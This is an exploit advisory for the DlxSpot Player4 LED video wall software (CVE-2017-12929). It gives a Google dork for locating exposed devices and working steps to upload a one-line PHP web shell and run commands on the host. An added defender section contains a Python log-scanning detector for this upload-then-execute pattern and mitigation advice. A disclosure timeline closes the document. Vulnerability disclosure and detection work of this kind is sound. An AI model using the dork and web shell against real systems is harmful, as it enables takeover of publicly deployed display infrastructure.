# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world; they are used in football arenas, concert halls, shopping malls, as road signs etc.
# CVE: CVE-2017-12929
# Linked CVE's: CVE-2017-12928, CVE-2017-12930.
# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################
Arbitrary File Upload leading to Remote Command Execution:

1. Visit http://host/resource.php and upload a PHP shell. For example:

   <?php system($_GET["c"]); ?>

2. RCE via http://host/resource/source/shell.php?c=id

3. Output: www-data
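Added note for defenders (this is not part of the original advisory): the pattern above leaves a clear trace in web server access logs, a POST to /resource.php followed by a GET of a server-side script under /resource/source/. The check below is example code written for this note; it assumes combined log format and runs over constructed sample lines, flagging any script fetched from the upload directory and marking it stronger when the same client uploaded first.

```python
"""Detect the DlxSpot upload-then-execute pattern in web server access logs."""
import re

# Constructed sample lines in Apache/nginx combined log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2017:10:01:02 +0000] "POST /resource.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [18/Sep/2017:10:01:05 +0000] "GET /resource/source/shell.php?c=id HTTP/1.1" 200 48 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Sep/2017:10:02:00 +0000] "GET /resource/source/logo.png HTTP/1.1" 200 9182 "-" "Mozilla/5.0"
198.51.100.4 - - [18/Sep/2017:10:02:10 +0000] "POST /resource.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Upload directory named in the advisory, and server-side extensions that
# should never be served from it (assumed list, extend for your deployment).
UPLOAD_DIR = "/resource/source/"
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar)(\?|$)", re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_upload_rce(log_text):
    """Return (ip, path, uploaded_first) for every GET of an executable script
    from the upload directory; uploaded_first is True when the same client
    POSTed to /resource.php earlier in the log."""
    uploaded_from = set()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].split("?")[0] == "/resource.php":
            uploaded_from.add(rec["ip"])
        elif (rec["method"] == "GET" and rec["path"].startswith(UPLOAD_DIR)
              and EXEC_EXT.search(rec["path"])):
            hits.append((rec["ip"], rec["path"], rec["ip"] in uploaded_from))
    return hits


if __name__ == "__main__":
    for ip, path, uploaded_first in find_upload_rce(SAMPLE_LOG):
        print(f"suspicious: {ip} fetched {path} (prior upload: {uploaded_first})")
```

On a live box the same check should be paired with the fix the advisory implies: reject executable extensions at upload time and store uploads outside the web root.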
TIMELINE:

2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVE's assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN